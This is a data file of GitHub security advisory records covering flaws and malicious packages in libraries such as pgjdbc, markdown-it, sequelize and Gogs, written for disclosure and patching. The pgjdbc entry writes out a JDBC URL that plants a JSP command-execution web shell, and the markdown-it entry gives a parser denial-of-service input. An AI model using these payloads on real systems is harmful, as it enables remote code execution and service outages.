{'https://nvd.nist.gov/vuln/detail/CVE-2019-18848', 'https://github.com/nov/json-jwt/commit/ada16e772906efdd035e3df49cb2ae372f0f948a', 'https://github.com/nov/json-jwt/compare/v1.10.2...v1.11.0', 'https://github.com/advisories/GHSA-cff7-6h4q-q5pj', 'https://lists.debian.org/debian-lts-announce/2020/10/msg00001.html'}
null
GHSA
GHSA-35g4-qx3c-vjhx
Automatic room upgrade handling can be used maliciously to bridge a room non-consentually
### Impact If a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any mailcious admin of a bridged room can repoint the traffic to a different room without the new room being aware. ### Patches Versions 2.6.1 and greater are patched. ### Workarounds Disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. ### References The issue is patched by https://github.com/matrix-org/matrix-appservice-bridge/pull/330 ### For more information] If you have any questions or comments about this advisory, email us at security@matrix.org.
{'CVE-2021-32659'}
2021-06-21T17:09:22Z
2021-06-21T17:09:22Z
MODERATE
6.5
{'CWE-306'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-32659', 'https://github.com/advisories/GHSA-35g4-qx3c-vjhx', 'https://github.com/matrix-org/matrix-appservice-bridge/releases/tag/2.6.1', 'https://github.com/matrix-org/matrix-appservice-bridge/pull/330', 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-35g4-qx3c-vjhx', 'https://github.com/matrix-org/matrix-appservice-bridge/commit/b69e745584a34fcfd858df33e4631e420da07b9f'}
null
GHSA
GHSA-6vfc-qv3f-vr6c
Uncontrolled Resource Consumption in markdown-it
### Impact Special patterns with length > 50K chars can slow down parser significantly. ```js const md = require('markdown-it')(); md.render(`x ${' '.repeat(150000)} x \nx`); ``` ### Patches Upgrade to v12.3.2+ ### Workarounds No. ### References Fix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101
{'CVE-2022-21670'}
2022-04-19T19:03:19Z
2022-01-12T22:20:22Z
MODERATE
5.3
{'CWE-400'}
{'https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21670', 'https://github.com/advisories/GHSA-6vfc-qv3f-vr6c', 'https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101'}
null
GHSA
GHSA-j9xp-92vc-559j
SQL Injection in sequelize
Affected versions of `sequelize` are vulnerable to SQL Injection. The package fails to sanitize JSON path keys in the MariaDB and MySQL dialects, which may allow attackers to inject SQL statements and execute arbitrary SQL queries. ## Recommendation If you are using `sequelize` 5.x, upgrade to version 5.8.11 or later. If you are using `sequelize` 4.x, upgrade to version 4.44.3 or later. If you are using `sequelize` 3.x, upgrade to version 3.35.1 or later.
{'CVE-2019-10748'}
2021-08-18T22:09:34Z
2019-11-06T17:11:10Z
CRITICAL
9.8
{'CWE-89'}
{'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450221', 'https://github.com/sequelize/sequelize/pull/11089,', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10748', 'https://www.npmjs.com/advisories/1018', 'https://github.com/advisories/GHSA-j9xp-92vc-559j', 'https://github.com/sequelize/sequelize/commit/a72a3f5,'}
null
GHSA
GHSA-45cp-hpc9-8347
Malicious Package in css_transform_support
Version 1.0.2 of `css_transform_support` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
null
2020-09-01T19:52:35Z
2020-09-01T19:52:35Z
CRITICAL
0
null
{'https://github.com/advisories/GHSA-45cp-hpc9-8347', 'https://www.npmjs.com/advisories/624'}
null
GHSA
GHSA-7v5r-r995-q2x2
SSRF in repository migration
Gogs is a self-hosted Git service. The malicious user is able to discover services in the internal network through repository migration functionality. All installations accepting public traffic are affected. Internal network CIDRs are prohibited to be used as repository migration targets. Users should upgrade to 0.12.5 or the latest 0.13.0+dev. Gogs should be ran in its own private network until users can update.
{'CVE-2022-0870'}
2022-03-24T23:23:22Z
2022-03-12T00:00:34Z
MODERATE
5
{'CWE-918'}
{'https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0870', 'https://github.com/advisories/GHSA-7v5r-r995-q2x2', 'https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531'}
null
GHSA
GHSA-gp32-7h29-rpxm
Moderate severity vulnerability that affects com.puppycrawl.tools:checkstyle
Checkstyle prior to 8.18 loads external DTDs by default, which can potentially lead to denial of service attacks or the leaking of confidential information.
{'CVE-2019-9658'}
2021-09-13T12:37:35Z
2019-03-14T15:39:14Z
MODERATE
5.3
{'CWE-611'}
{'https://lists.debian.org/debian-lts-announce/2019/04/msg00029.html', 'https://checkstyle.org/releasenotes.html#Release_8.18', 'https://github.com/checkstyle/checkstyle/issues/6474', 'https://lists.apache.org/thread.html/994221405e940e148adcfd9cb24ffc6700bed70c7820c55a22559d26@%3Cnotifications.fluo.apache.org%3E', 'https://github.com/checkstyle/checkstyle/issues/6478', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2BMOPJ2XYE4LB2HM7OMSUBBIYEDUTLWE/', 'https://lists.apache.org/thread.html/fff26ee7b59360a0264fef4e8ed9454ef652db2c39f2892a9ea1c9cb@%3Cnotifications.fluo.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-9658', 'https://lists.apache.org/thread.html/7eea10e7be4c21060cb1e79f6524c6e6559ba833b1465cd2870a56b9@%3Cserver-dev.james.apache.org%3E', 'https://lists.apache.org/thread.html/a35a8ccb316d4c2340710f610cba8058e87d5376259b35ef3ed2bf89@%3Cnotifications.accumulo.apache.org%3E', 'https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AEYBAHYAV37WHMOXZYM2ZWF46FHON6YC/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJPT54USMGWT3Y6XVXLDEHKRUY2EI4OE/', 'https://github.com/checkstyle/checkstyle/pull/6476', 'https://lists.apache.org/thread.html/6bf8bbbca826e883f09ba40bc0d319350e1d6d4cf4df7c9e399b2699@%3Ccommits.fluo.apache.org%3E', 'https://github.com/advisories/GHSA-gp32-7h29-rpxm'}
null
GHSA
GHSA-g4hj-r7r3-9rwv
OS Command Injection in gulp-scss-lint
gulp-scss-lint through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands to the &quot;exec&quot; function located in &quot;src/command.js&quot; via the provided options.
{'CVE-2020-7601'}
2021-07-28T20:50:14Z
2021-05-07T16:15:37Z
CRITICAL
9.8
{'CWE-98'}
{'https://github.com/advisories/GHSA-g4hj-r7r3-9rwv', 'https://snyk.io/vuln/SNYK-JS-GULPSCSSLINT-560114', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7601'}
null
GHSA
GHSA-49r3-3h96-rwj6
Cross-Site Scripting in ids-enterprise
Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). The `soho-dropdown` component does not properly encode its output and may allow attackers to execute arbitrary JavaScript. ## Recommendation Upgrade to version 4.18.2 or later
null
2021-08-16T15:19:11Z
2019-06-13T19:09:31Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-49r3-3h96-rwj6', 'https://github.com/infor-design/enterprise/commit/6bd74d8f38c268b22f31e8169316e065e0093362', 'https://www.npmjs.com/advisories/956', 'https://github.com/infor-design/enterprise-ng/issues/503'}
null
GHSA
GHSA-2563-83p7-f34p
Malicious Package in requestt
All versions of `requestt` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T14:04:11Z
2020-09-02T20:24:41Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/856', 'https://github.com/advisories/GHSA-2563-83p7-f34p'}
null
GHSA
GHSA-rh6x-qvg7-rrmj
High severity vulnerability that affects ansible
The create_script function in the lxc_container module in Ansible before 1.9.6-1 and 2.x before 2.0.2.0 allows local users to write to arbitrary files or gain privileges via a symlink attack on (1) /opt/.lxc-attach-script, (2) the archived container in the archive_path directory, or the (3) lxc-attach-script.log or (4) lxc-attach-script.err files in the temporary directory.
{'CVE-2016-3096'}
2021-09-17T18:18:54Z
2018-10-10T17:23:45Z
HIGH
7.8
{'CWE-59'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-3096', 'https://github.com/advisories/GHSA-rh6x-qvg7-rrmj'}
null
GHSA
GHSA-959j-5g9v-3fpq
Low severity vulnerability that affects paratrooper-newrelic
The paratrooper-newrelic gem 1.0.1 for Ruby allows local users to obtain the X-Api-Key value by listing the curl process.
{'CVE-2014-1234'}
2021-09-07T20:42:36Z
2017-10-24T18:33:36Z
LOW
0
{'CWE-200'}
{'http://openwall.com/lists/oss-security/2014/01/08/2', 'https://github.com/advisories/GHSA-959j-5g9v-3fpq', 'https://nvd.nist.gov/vuln/detail/CVE-2014-1234', 'http://www.vapid.dhs.org/advisories/paratrooper-newrelic-api.html'}
null
GHSA
GHSA-phwj-86vx-cfjc
Cross-site scripting in Apache Jena Fuseki
A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive).
{'CVE-2021-33192'}
2021-08-13T15:21:35Z
2021-08-13T15:21:35Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-phwj-86vx-cfjc', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33192', 'https://lists.apache.org/thread.html/r684d8943d755a96fe90f8cd8df196737b6bde3f2b74e15a9bd479975%40%3Cusers.jena.apache.org%3E'}
null
GHSA
GHSA-p65h-233c-jxvm
Downloads Resources over HTTP in resourcehacker
Affected versions of `resourcehacker` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `resourcehacker`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10646'}
2021-01-08T18:23:56Z
2018-08-15T19:03:59Z
HIGH
0
{'CWE-311'}
{'https://github.com/advisories/GHSA-p65h-233c-jxvm', 'https://www.npmjs.com/advisories/254', 'https://nodesecurity.io/advisories/254', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10646', 'https://github.com/felicienfrancois/node-resourcehacker/blob/master/scripts/install.js#L4'}
null
GHSA
GHSA-673j-qm5f-xpv8
Arbitrary File Write Vulnerability
### Overview The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control. It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system. While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging. If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application. ### Impact It is possible to specify an arbitrary filename in the loggerFileName connection parameter "jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>" This creates a valid JSP file which could lead to a Remote Code Execution ### Patches Problem has been resolved in version 42.3.3 ### Workarounds sanitize the inputs to the driver
null
2022-02-16T00:32:02Z
2022-02-16T00:08:18Z
MODERATE
0
null
{'https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8', 'https://github.com/advisories/GHSA-673j-qm5f-xpv8', 'https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064'}
null
GHSA
GHSA-gcm9-cc3r-c6vj
Cross-site Scripting (XSS) in Eclipse Theia
In Eclipse Theia versions up to and including 1.2.0, the Markdown Preview (@theia/preview), can be exploited to execute arbitrary code.
{'CVE-2020-27224'}
2021-04-13T15:18:09Z
2021-04-13T15:18:09Z
CRITICAL
9.6
{'CWE-79'}
{'https://github.com/eclipse-theia/theia/issues/7954', 'https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/', 'https://github.com/advisories/GHSA-gcm9-cc3r-c6vj', 'https://nvd.nist.gov/vuln/detail/CVE-2020-27224', 'https://github.com/eclipse-theia/theia/pull/7971'}
null
GHSA
GHSA-g7q5-pjjr-gqvp
Regular Expression Denial of Service in tough-cookie
Affected versions of `tough-cookie` are susceptible to a regular expression denial of service. The amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length. If node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node. ## Recommendation Update to version 2.3.3 or later.
{'CVE-2017-15010'}
2021-09-10T20:28:20Z
2018-07-24T20:14:39Z
HIGH
7.5
{'CWE-400'}
{'https://access.redhat.com/errata/RHSA-2018:1264', 'https://www.npmjs.com/advisories/525', 'https://github.com/advisories/GHSA-g7q5-pjjr-gqvp', 'https://snyk.io/vuln/npm:tough-cookie:20170905', 'http://www.securityfocus.com/bid/101185', 'https://access.redhat.com/errata/RHSA-2018:1263', 'https://nodesecurity.io/advisories/525', 'https://access.redhat.com/errata/RHSA-2017:2913', 'https://access.redhat.com/errata/RHSA-2017:2912', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6VEBDTGNHVM677SLZDEHMWOP3ISMZSFT/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15010', 'https://github.com/salesforce/tough-cookie/issues/92'}
null
GHSA
GHSA-fw99-f933-rgh8
Out-of-bounds Read and Out-of-bounds Write in OpenCV
An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 4.1.1.26). There is an out of bounds read/write in the function HaarEvaluator::OptFeature::calc in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service.
{'CVE-2019-14492'}
2021-10-12T22:09:31Z
2021-10-12T22:09:31Z
HIGH
7.5
{'CWE-787', 'CWE-125'}
{'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html', 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a', 'https://github.com/opencv/opencv/issues/15124', 'https://github.com/advisories/GHSA-fw99-f933-rgh8', 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14492'}
null
GHSA
GHSA-5p28-63mc-cgr9
Cross-Site Scripting bypass in html-purify
All versions of html-purify are vulnerable to cross-site scripting. The data attribute inside of object tags is not properly sanitized and allows javascript URIs leading to code execution. No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-12-04T20:04:37Z
2020-12-04T20:04:37Z
HIGH
0
{'CWE-79'}
{'https://www.npmjs.com/advisories/1586', 'https://github.com/advisories/GHSA-5p28-63mc-cgr9'}
null
GHSA
GHSA-jq7p-26h5-w78r
Out-of-bounds read in Apache Thrift
In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data.
{'CVE-2019-0210'}
2021-07-27T22:20:55Z
2021-05-18T15:32:04Z
HIGH
7.5
{'CWE-125'}
{'https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0811', 'https://github.com/apache/thrift/blob/master/CHANGES.md#0130', 'http://mail-archives.apache.org/mod_mbox/thrift-dev/201910.mbox/%3C277A46CA87494176B1BBCF5D72624A2A%40HAGGIS%3E', 'https://access.redhat.com/errata/RHSA-2020:0806', 'https://lists.apache.org/thread.html/rab740e5c70424ef79fd095a4b076e752109aeee41c4256c2e5e5e142@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0210', 'https://lists.apache.org/thread.html/r2832722c31d78bef7526e2c701ba4b046736e4c851473194a247392f@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r55609613abab203a1f2c1f3de050b63ae8f5c4a024df0d848d6915ff@%3Ccommits.pulsar.apache.org%3E', 'https://security.gentoo.org/glsa/202107-32', 'https://access.redhat.com/errata/RHSA-2020:0804', 'https://github.com/apache/thrift/commit/264a3f318ed3e9e51573f67f963c8509786bcec2', 'https://access.redhat.com/errata/RHSA-2020:0805', 'https://github.com/advisories/GHSA-jq7p-26h5-w78r'}
null
GHSA
GHSA-vpw8-43wm-rxw5
Double free in endian_trait
An issue was discovered in the endian_trait crate through 2021-01-04 for Rust. A double drop can occur when a user-provided Endian impl panics.
{'CVE-2021-29929'}
2021-08-25T20:54:06Z
2021-08-25T20:54:06Z
HIGH
7.5
{'CWE-415'}
{'https://gitlab.com/myrrlyn/endian_trait/-/issues/1', 'https://github.com/advisories/GHSA-vpw8-43wm-rxw5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29929', 'https://rustsec.org/advisories/RUSTSEC-2021-0039.html'}
null